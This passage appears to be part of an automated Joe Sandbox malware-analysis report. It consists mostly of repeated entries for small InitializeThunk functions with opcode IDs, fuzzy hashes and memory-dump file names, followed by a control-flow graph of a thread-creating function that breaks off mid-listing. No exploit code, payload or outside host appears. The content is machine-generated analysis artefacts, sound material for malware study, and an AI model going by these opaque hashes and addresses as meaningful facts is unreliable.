                                                        • Instruction ID: 0e1f4fbc98658469cd97c856bc917377e58940e8613cce021582c27d04b8c2a8
                                                        • Opcode Fuzzy Hash: 055ab088e431d28e3542a639332d7435569a756726e9b7873cdf60f1c00aab97
                                                        • Instruction Fuzzy Hash: 79900261242404034105B5584414616500A87E1201B59C021E1014690EC76589A16125
                                                        Function 03602BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 8d9a9ce86da5210ddc7c3bf92b8c1f0cfc7c418f8fde50be50ca90b3b7470ac4
                                                        • Instruction ID: 8c2f84e73e223ed05f08465261c532d0f843fda30b142c0fe04d7cbd7a7dda19
                                                        • Opcode Fuzzy Hash: 8d9a9ce86da5210ddc7c3bf92b8c1f0cfc7c418f8fde50be50ca90b3b7470ac4
                                                        • Instruction Fuzzy Hash: 4A90023124544C43D140B5584404A46101587D1305F59C011A0064794E97658E65B661
                                                        Function 03602BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 54ec5c8aae24fe4b52c77d404085176d94152ba8e24fa82aa2d3659e963b2e5a
                                                        • Instruction ID: fd3a474d9c95119cd7ddcb356fcdc89e1379132b334d315d6f5cedd67bdd1f47
                                                        • Opcode Fuzzy Hash: 54ec5c8aae24fe4b52c77d404085176d94152ba8e24fa82aa2d3659e963b2e5a
                                                        • Instruction Fuzzy Hash: 7990023124140C03D180B558440464A100587D2301F99C015A0025754ECB558B6977A1
                                                        Function 03602BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 1e7eb9c1d76d9ed46668bffd2def09888d45b63440f3d3ce4c83fe9a93b18506
                                                        • Instruction ID: d2d10c5d0b57d69bf27871e78878ca9a303ac0d8b1c20b2ecb8d6b5394f98645
                                                        • Opcode Fuzzy Hash: 1e7eb9c1d76d9ed46668bffd2def09888d45b63440f3d3ce4c83fe9a93b18506
                                                        • Instruction Fuzzy Hash: 9690023164540C03D150B5584414746100587D1301F59C011A0024754E87958B6576A1
                                                        Function 03602AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2804ae2a1bb539127409e3d51a5e264642ba12dfa563b8c559d2d4386508e0a1
                                                        • Instruction ID: 1fa1a3d2213f1e44734a8279b274468da7a70599b785842fa2a4d7dc3da9a37e
                                                        • Opcode Fuzzy Hash: 2804ae2a1bb539127409e3d51a5e264642ba12dfa563b8c559d2d4386508e0a1
                                                        • Instruction Fuzzy Hash: E8900225261404030145F958060450B144597D7351399C015F1416690DC76189755321
                                                        Function 03602AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 79d3aec4936510509c555f339113f9866d762076bc0422437cae3852f60f5d3d
                                                        • Instruction ID: 4680af84a8fc2ec5f69cd089f92022e5a24f88063754da5b7e648adb9cc00ed2
                                                        • Opcode Fuzzy Hash: 79d3aec4936510509c555f339113f9866d762076bc0422437cae3852f60f5d3d
                                                        • Instruction Fuzzy Hash: 2A900435351404030105FD5C07045071047C7D735135DC031F1015750DD771CD715131
                                                        Function 03602F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2cb8dac36766997b12d4c0186ef3b42eb57a6f1a588fd1b75107c5a1acae44c7
                                                        • Instruction ID: e121ff308be50221e5bce1f7ad791c0cddec48a4462203e816237b28faec0500
                                                        • Opcode Fuzzy Hash: 2cb8dac36766997b12d4c0186ef3b42eb57a6f1a588fd1b75107c5a1acae44c7
                                                        • Instruction Fuzzy Hash: E890026138140843D100B5584414B061005C7E2301F59C015E1064654E8759CD626126
                                                        Function 03602FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4537a317f4f3310f32096465310f3b1fa28f5562b6f331a4703033bec9b5fdd7
                                                        • Instruction ID: da46af394037fba603fbe9b928c61ca5d78528f24355fe6095b4cc03e67a1b75
                                                        • Opcode Fuzzy Hash: 4537a317f4f3310f32096465310f3b1fa28f5562b6f331a4703033bec9b5fdd7
                                                        • Instruction Fuzzy Hash: FA900221251C0443D200B9684C14B07100587D1303F59C115A0154654DCB5589715521
                                                        Function 03602FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: dc42865e439f773d1cc9a4f2079afb152c7caf8d4365797578870f3016986377
                                                        • Instruction ID: 87cfec00ca6415ca01a3775840499bfd2652a3f912b687f656c77006e4049fb2
                                                        • Opcode Fuzzy Hash: dc42865e439f773d1cc9a4f2079afb152c7caf8d4365797578870f3016986377
                                                        • Instruction Fuzzy Hash: 5D900221641404434140B56888449065005ABE2211759C121A0998650E879989755665
                                                        Function 03602EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a70789d9c9f60cf38bca84120fa8e418d7919c69fe90a9c112d493deca854d77
                                                        • Instruction ID: a23e1193385f49c692f2a5f532e2e68481b5e84bacaf17e97e6406ad05e445ca
                                                        • Opcode Fuzzy Hash: a70789d9c9f60cf38bca84120fa8e418d7919c69fe90a9c112d493deca854d77
                                                        • Instruction Fuzzy Hash: AC90026124180803D140B9584804607100587D1302F59C011A2064655F8B698D616135
                                                        Function 03602E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 40924b99ca36896c1c9a74ce17ea28fd8d0f14daf6ea750b939d2a94cea328b6
                                                        • Instruction ID: a315933f9f2f0992c69b33140c5bccdb9690a4a764950412c314a25332aa43a2
                                                        • Opcode Fuzzy Hash: 40924b99ca36896c1c9a74ce17ea28fd8d0f14daf6ea750b939d2a94cea328b6
                                                        • Instruction Fuzzy Hash: 2F90022164140903D101B5584404616100A87D1241F99C022A1024655FCB658AA2A131
                                                        Function 03602D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f87a49fc4fe2a5cf9f3676d34791eeffb60e7e1f513dec0e0f7dc0fc306a1e1f
                                                        • Instruction ID: cc7480f4979eb7a1257a5a540a3707bf79df16752f58dababdafbb0ae151b91b
                                                        • Opcode Fuzzy Hash: f87a49fc4fe2a5cf9f3676d34791eeffb60e7e1f513dec0e0f7dc0fc306a1e1f
                                                        • Instruction Fuzzy Hash: 1890022134140403D140B55854186065005D7E2301F59D011E0414654DDB5589665222
                                                        Function 03602D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: bed183518bc2960e2360f351e20e9269b9d45fabaebaa737ab0e98390af5a7f8
                                                        • Instruction ID: 4ddf0ce2ca4a907e15295037769b14055c96f40d9fd9fdcac2175db82a1328fd
                                                        • Opcode Fuzzy Hash: bed183518bc2960e2360f351e20e9269b9d45fabaebaa737ab0e98390af5a7f8
                                                        • Instruction Fuzzy Hash: EA90022925340403D180B558540860A100587D2202F99D415A0015658DCB5589795321
                                                        Function 03602DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 396e0bde74f079c0d91f303e5137bb6caf546e6d16b6feadb4c618d2c6e3fb0a
                                                        • Instruction ID: d7987e8aa9573673f20956de76365fcd9a680a4e56178111c2008aeb203ad59a
                                                        • Opcode Fuzzy Hash: 396e0bde74f079c0d91f303e5137bb6caf546e6d16b6feadb4c618d2c6e3fb0a
                                                        • Instruction Fuzzy Hash: 3290023124140813D111B5584504707100987D1241F99C412A0424658E97968A62A121
                                                        Function 03602DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 7440a5a8764261f606bd21b63b38843418f6a378f48a7a221f20e6cbb886165e
                                                        • Instruction ID: 3c7677f81f86906e297b08bae69c8aed938c1c14f2b1fc15a7aa7ea6e4c2dc28
                                                        • Opcode Fuzzy Hash: 7440a5a8764261f606bd21b63b38843418f6a378f48a7a221f20e6cbb886165e
                                                        • Instruction Fuzzy Hash: 69900221282445535545F5584404507500697E1241799C012A1414A50D87669966D621
                                                        Function 03602C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a718cc84541cd2abeffc9be23017e66cb5173cff8a883bda87274ad6aef57c2b
                                                        • Instruction ID: 8c1aa9821ade9779354eca6aee8427a1b51a43bef6f3928860ac0cf23b427ec5
                                                        • Opcode Fuzzy Hash: a718cc84541cd2abeffc9be23017e66cb5173cff8a883bda87274ad6aef57c2b
                                                        • Instruction Fuzzy Hash: B590023124140C43D100B5584404B46100587E1301F59C016A0124754E8755C9617521
                                                        Function 03602C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 0d1925ea935ef9f13925bf2c18c6d86e715ffea08d2afc2fc961896a0f6388a4
                                                        • Instruction ID: b064da4f732a764c628637c442f9b8fe4963bca6916e0631b3d6044aa7d2830b
                                                        • Opcode Fuzzy Hash: 0d1925ea935ef9f13925bf2c18c6d86e715ffea08d2afc2fc961896a0f6388a4
                                                        • Instruction Fuzzy Hash: 2F90023124148C03D110B558840474A100587D1301F5DC411A4424758E87D589A17121
                                                        Function 03602CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 4c31343a5f61f7149dc365ba3f1e27ec6b6a4a38fa2729ca43127ee8ac614d9c
                                                        • Instruction ID: 1c2e73d920cd4be87e00aae64dcc1610f4e969bf4b177a1a9d545b57d66fb807
                                                        • Opcode Fuzzy Hash: 4c31343a5f61f7149dc365ba3f1e27ec6b6a4a38fa2729ca43127ee8ac614d9c
                                                        • Instruction Fuzzy Hash: DC90023124140803D100B9985408646100587E1301F59D011A5024655FC7A589A16131
                                                        Function 036035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2c26b80b770623dad2c6f128528afcc3da6679c5f98bf042d883a34b80c3c221
                                                        • Instruction ID: 6c0d0df0e9b7f415a3c9391ef3fdc6c0ebcb568441b8203c29b40391684a91fa
                                                        • Opcode Fuzzy Hash: 2c26b80b770623dad2c6f128528afcc3da6679c5f98bf042d883a34b80c3c221
                                                        • Instruction Fuzzy Hash: DF90023164550803D100B5584514706200587D1201F69C411A0424668E87D58A6165A2
                                                        Function 036039B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, Offset: 03590000, based on PE: true
                                                        • Associated: 0000000A.00000002.4571886070.00000000036B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.00000000036BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_3590000_compact.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 99ab350928e9f956752344e9e72353fc7713d477922e3079569abef6d7a5b144
                                                        • Instruction ID: a4c65b3bbcf034e11d213d55853542d616f602466a8e363b7280784d24da3358
                                                        • Opcode Fuzzy Hash: 99ab350928e9f956752344e9e72353fc7713d477922e3079569abef6d7a5b144
                                                        • Instruction Fuzzy Hash: E690022128545503D150B55C44046165005A7E1201F59C021A0814694E879589656221
                                                        Function 02E19688 Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 187threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 2e19688-2e1968e 1 2e19690-2e196c1 call 2e11410 call 2e315d0 0->1 2 2e196ff-2e19bc0 0->2 15 2e196e0-2e196e5 1->15 16 2e196c3-2e196df call 2e3b7a7 CreateThread 1->16 3 2e19bca-2e19bd4 2->3 5 2e19bd6-2e19bf5 3->5 6 2e19c08-2e19c12 3->6 9 2e19bf7-2e19c00 5->9 10 2e19c06 5->10 8 2e19c23-2e19c2f 6->8 13 2e19c31-2e19c3d 8->13 14 2e19c4d-2e19c54 8->14 9->10 10->3 17 2e19c4b 13->17 18 2e19c3f-2e19c45 13->18 19 2e19c86-2e19c8d 14->19 20 2e19c56-2e19c84 14->20 16->2 17->8 18->17 23 2e19cb2-2e19cb6 19->23 24 2e19c8f-2e19ca5 19->24 20->14 25 2e19d00-2e19d07 23->25 26 2e19cb8-2e19cc0 23->26 28 2e19cb0 24->28 29 2e19ca7-2e19cad 24->29 32 2e19d39-2e19d56 25->32 33 2e19d09-2e19d37 25->33 30 2e19cc2-2e19cc6 26->30 31 2e19cc7-2e19cd9 26->31 28->19 29->28 30->31 34 2e19ce0-2e19ce2 31->34 35 2e19cdb-2e19cdf 31->35 36 2e19d67-2e19d70 32->36 33->25 37 2e19cf0-2e19cfe 34->37 38 2e19ce4-2e19ced 34->38 35->34 39 2e19d72-2e19d84 36->39 40 2e19d86-2e19d90 36->40 37->23 38->37 39->36 42 2e19d92-2e19d9d 40->42 43 2e19dca-2e19ddb 40->43 45 2e19da4-2e19da6 42->45 46 2e19d9f-2e19da3 42->46 44 2e19dec-2e19df5 43->44 49 2e19df7-2e19e09 44->49 50 2e19e0b 44->50 47 2e19db9-2e19dc2 45->47 48 2e19da8-2e19db7 45->48 46->45 51 2e19dc8 47->51 48->51 49->44 53 2e19e12-2e19e19 50->53 51->40 54 2e19e1b-2e19e48 53->54 55 2e19e4a 53->55 54->53 56 2e19e51-2e19e5a 55->56 57 2e19e60-2e19e6a 56->57 58 2e1a0da-2e1a0e1 56->58 61 2e19e7b-2e19e87 57->61 59 2e1a0e7-2e1a0f1 58->59 60 2e1a256-2e1a260 58->60 65 2e1a102-2e1a10b 59->65 64 2e1a271-2e1a27d 60->64 62 2e19e89-2e19e99 61->62 63 2e19eac-2e19eb5 61->63 66 2e19e9b-2e19ea4 62->66 67 2e19eaa 62->67 70 2e19eb7-2e19ed8 63->70 71 2e19eda-2e19ee1 63->71 68 2e1a295-2e1a29f 64->68 69 2e1a27f-2e1a288 64->69 72 2e1a121-2e1a12b 65->72 73 2e1a10d-2e1a11f 65->73 66->67 67->61 79 2e1a2b0-2e1a2b9 68->79 75 2e1a293 69->75 76 2e1a28a-2e1a290 69->76 70->63 77 2e19f03-2e19f06 71->77 78 2e19ee3-2e19f01 71->78 81 2e1a13c-2e1a148 72->81 73->65 75->64 76->75 83 2e19f0c-2e19f10 77->83 78->71 84 2e1a2bb-2e1a2ca 79->84 85 2e1a2cc-2e1a2d6 79->85 86 2e1a14a-2e1a15c 81->86 87 2e1a15e-2e1a165 81->87 88 2e19f12-2e19f37 83->88 89 2e19f39-2e19f43 83->89 84->79 91 2e1a2e7-2e1a2f3 85->91 86->81 93 2e1a167-2e1a19a 87->93 94 2e1a19c-2e1a1a6 87->94 88->83 95 2e19f54-2e19f60 89->95 96 2e1a2f5-2e1a308 91->96 97 2e1a30a-2e1a314 91->97 93->87 98 2e1a1b7-2e1a1c3 94->98 101 2e19f62-2e19f74 95->101 102 2e19f76-2e19f85 95->102 96->91 99 2e1a1c5-2e1a1ce 98->99 100 2e1a1ea-2e1a1f3 98->100 104 2e1a1d0-2e1a1d4 99->104 105 2e1a1d5-2e1a1d7 99->105 106 2e1a1f5-2e1a20d 100->106 107 2e1a20f-2e1a219 100->107 101->95 109 2e19f8b-2e19f95 102->109 110 2e1a00f-2e1a019 102->110 104->105 113 2e1a1d9-2e1a1e2 105->113 114 2e1a1e8 105->114 106->100 115 2e1a22a-2e1a233 107->115 111 2e19f97-2e19fb1 109->111 112 2e19fcd-2e19fd7 109->112 116 2e1a02a-2e1a034 110->116 117 2e19fb3-2e19fb7 111->117 118 2e19fb8-2e19fba 111->118 119 2e19fe8-2e19ff4 112->119 113->114 114->98 121 2e1a251 call 2e39e40 115->121 122 2e1a235-2e1a241 115->122 123 2e1a036-2e1a08c 116->123 124 2e1a08e-2e1a0a2 116->124 117->118 125 2e19fcb 118->125 126 